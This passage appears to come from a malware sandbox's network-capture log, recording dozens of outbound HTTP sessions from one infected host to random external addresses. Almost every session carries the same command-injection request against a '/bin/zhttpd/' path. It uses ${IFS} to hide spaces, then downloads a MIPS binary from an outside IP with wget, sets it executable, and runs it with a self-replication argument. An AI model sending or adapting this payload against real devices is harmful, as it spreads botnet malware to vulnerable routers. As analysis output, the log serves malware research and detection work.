                                    Jan 13, 2024 19:02:38.274538994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5495192.168.2.1360360179.82.227.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274600983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5496192.168.2.1351080150.105.180.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274637938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5497192.168.2.135386232.211.193.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274665117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5498192.168.2.1332866146.48.173.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274697065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5499192.168.2.1337288134.75.82.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274744987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5500192.168.2.1337206210.28.209.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274787903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5501192.168.2.1360600124.204.22.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274867058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5502192.168.2.1339636202.159.149.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274916887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5503192.168.2.1336142140.17.229.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274956942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5504192.168.2.134848252.208.75.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275021076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5505192.168.2.135234045.194.5.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275072098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5506192.168.2.135974095.185.175.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275129080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5507192.168.2.1351614223.43.108.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275177956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5508192.168.2.1339444111.176.42.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275238037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5509192.168.2.1342986187.7.99.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275276899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5510192.168.2.136037274.181.53.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275316954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5511192.168.2.13392485.128.105.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275371075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5512192.168.2.1335256157.154.255.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275410891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5513192.168.2.1341188202.197.71.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275465965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5514192.168.2.135853683.61.102.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275522947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5515192.168.2.1357640106.252.53.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275579929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5516192.168.2.133402481.129.28.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275649071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5517192.168.2.134036832.148.135.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275693893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5518192.168.2.1343370107.140.191.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275753021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5519192.168.2.1338628146.84.150.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275806904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5520192.168.2.134893036.225.84.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275854111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5521192.168.2.135810297.139.29.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275926113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5522192.168.2.135472891.79.149.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.275974035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5523192.168.2.1342290166.19.144.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276002884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5524192.168.2.13586269.176.218.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276066065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5525192.168.2.135014481.224.108.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276114941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5526192.168.2.135591052.166.10.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276165009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5527192.168.2.1355662136.49.243.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276207924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5528192.168.2.1343226192.44.183.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276245117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5529192.168.2.1348792110.248.166.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276312113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5530192.168.2.134692094.204.155.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276364088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5531192.168.2.134088480.90.113.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276388884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5532192.168.2.1353074125.48.29.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276412964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5533192.168.2.134220243.120.147.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276469946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5534192.168.2.1341686164.231.125.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276520967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5535192.168.2.1337892179.179.124.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276585102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5536192.168.2.1346600162.58.126.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276647091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5537192.168.2.133764227.230.188.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276705980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5538192.168.2.1346390210.76.174.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276753902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5539192.168.2.135914245.244.9.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276796103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5540192.168.2.1347516219.161.224.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276837111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5541192.168.2.1358704130.138.227.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276896000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5542192.168.2.1349590221.42.131.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276962996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5543192.168.2.135905453.95.35.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.276993036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5544192.168.2.134579267.92.147.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.277035952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5545192.168.2.1358610122.124.160.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.277106047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5546192.168.2.1346336151.110.23.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.277178049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5547192.168.2.1354170193.128.69.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.281708002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5548192.168.2.134160631.64.135.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.281742096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5549192.168.2.135111883.119.4.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.281795979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5550192.168.2.1355952189.242.228.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.281855106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5551192.168.2.13449528.176.62.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.281896114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5552192.168.2.134177444.169.74.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289549112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5553192.168.2.134648018.92.22.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289612055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5554192.168.2.1358042124.17.177.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289654016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5555192.168.2.13404329.202.182.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289716005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5556192.168.2.1355608138.23.176.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289787054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5557192.168.2.13361401.159.28.173443
                                    TimestampBytes transferredDirectionData
